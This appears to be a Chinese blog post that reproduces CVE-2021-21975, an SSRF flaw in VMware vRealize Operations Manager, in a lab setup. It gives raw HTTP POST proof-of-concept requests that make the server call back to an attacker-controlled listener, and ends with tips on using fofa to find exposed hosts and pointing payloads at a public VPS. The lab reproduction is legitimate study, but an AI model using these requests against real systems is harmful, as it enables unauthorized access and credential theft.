VMware vRealize Operations Manager SSRF 漏洞简单复现

地球胖头鱼 2021-04-14
Web安全 发布于 2021-04-14 10:27:57 阅读 176 评论 0

简介

vRealize Operations Manager 是vmware官方提供的针对vmware虚拟化平台的一套运维管理解决方案。2021 年 3 月 31 日,VMware官方发布安全公告,披露了CVE-2021-21975 VMware vRealize Operations Manager API SSRF。攻击者在无需身份验证和用户交互的情况下,可利用此漏洞窃取管理凭,可直接反弹shell 。

影响版本

VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、8.0.1、8.0.0、7.5.0
VMware Cloud Foundation 4.x,3.x

漏洞原理

由于/casa/nodes/thumbprints该路径的API网络访问权限存在漏洞。攻击者可通过vRealize Operations Manager API的网络访问权限构造恶意请求,可以执行服务器端请求伪造攻击,以窃取管理凭据。

漏洞复现

这里选择8.3.0版本,有兴趣的同学可以考虑一下其他版本的。还有就是需要注册一个账号才能下载。

VMware vRealize Operations Manager SSRF漏洞简单复现

激活之后登录选择下载版本,下载地址

https://my.vmware.com/zh/group/vmware/patch#search

VMware vRealize Operations Manager SSRF漏洞简单复现

下载完成之后选择打开方式,打开方式选择vmware

VMware vRealize Operations Manager SSRF漏洞简单复现

然后选择下一步

VMware vRealize Operations Manager SSRF漏洞简单复现

然后选择导入,然后等着进度条跑完就可以了。

VMware vRealize Operations Manager SSRF漏洞简单复现

导入成功后,启动该虚拟机。

VMware vRealize Operations Manager SSRF漏洞简单复现

VMware vRealize Operations Manager SSRF漏洞简单复现

注意:这个需要有初始化时间,千万要等着初始化时间走完才行,否则你没有初始化结束就重启机器那前面的时间就白费了,就要在重新 导入一次虚拟机镜像了。

完成初始化后,去访问他显示的那个ip地址,记得使用HTTPS协议来进行访问。当你访问这个地址的时候他会自己重定向到UI界面。

VMware vRealize Operations Manager SSRF漏洞简单复现

接下来就是选择快速安装,无脑下一步且设置好密码,点击完成即可。

VMware vRealize Operations Manager SSRF漏洞简单复现

VMware vRealize Operations Manager SSRF漏洞简单复现

VMware vRealize Operations Manager SSRF漏洞简单复现

等一会时间我们就可以访问到Index页面就说明环境搭建成功,使用刚才设置的账号密码登录即可。

VMware vRealize Operations Manager SSRF漏洞简单复现

漏洞利用

漏洞利用POC

POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.***.***
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 36
["payload_address"]

构造payload

POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.***.***
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 23
["192.168.***.***:2222"]

使用burpsuite抓包,修改Host,然后查看回显。

VMware vRealize Operations Manager SSRF漏洞简单复现

然后监听2222端口且查看结果。

VMware vRealize Operations Manager SSRF漏洞简单复现

windows下自己下载nc.exe,复现的话利用ssrf反弹shell到自己本地比较方便,有一点比较值得注意的就是poc的选择,网上的poc多多少少个别字段有些差异,刚开始反弹不到本地返回信息一直显示400和404,失败的原因就是poc选择的有问题,再有的利用方法可以使用fofa搜索引擎找到好一点的指纹,然后利用POC,修改修改payload的地址为dnslog或者公网vps,反弹shell即可。

总结

先说一下本文章只是环境搭建与测试,请不要非法使用否则和我没什么关系。另一个就是VMware已经在官网发布了这个漏洞的安全补丁,建议使用该系统的去官网下载更新。还有就是如果文章中有什么错误请大佬在评论区指出,大家一起学习。

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章248
  • 作者收获粉丝10
  • 作者收到点赞3
  • 所有文章被收藏了5
  • 博客总访问量排行第2
  • 博客总访问量7.6 万(每日更新)
查看所有博文